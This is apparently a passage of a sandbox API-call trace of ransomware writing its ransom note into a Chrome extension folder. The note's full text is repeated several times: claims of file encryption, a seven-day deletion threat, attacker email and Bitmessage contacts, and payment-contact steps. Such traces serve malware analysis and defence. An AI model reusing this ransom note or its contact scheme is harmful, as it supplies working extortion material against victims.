m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x04þV\\Á\x1aþ®×\x09ãox21'­_&¶jD\x8dÓ\r", lpUsedDefaultChar=0x0) returned 8717 [0297.271] WriteFile (in: hFile=0x2f4, lpBuffer=0x245d7a8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x245d7a8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0297.272] CloseHandle (hObject=0x2f4) returned 1 [0297.272] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mr\\#readme_eman#.rtf")) returned 0xffffffff [0297.272] GetLastError () returned 0x2 [0297.272] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\mr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f4 [0297.273] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.273] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.273] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 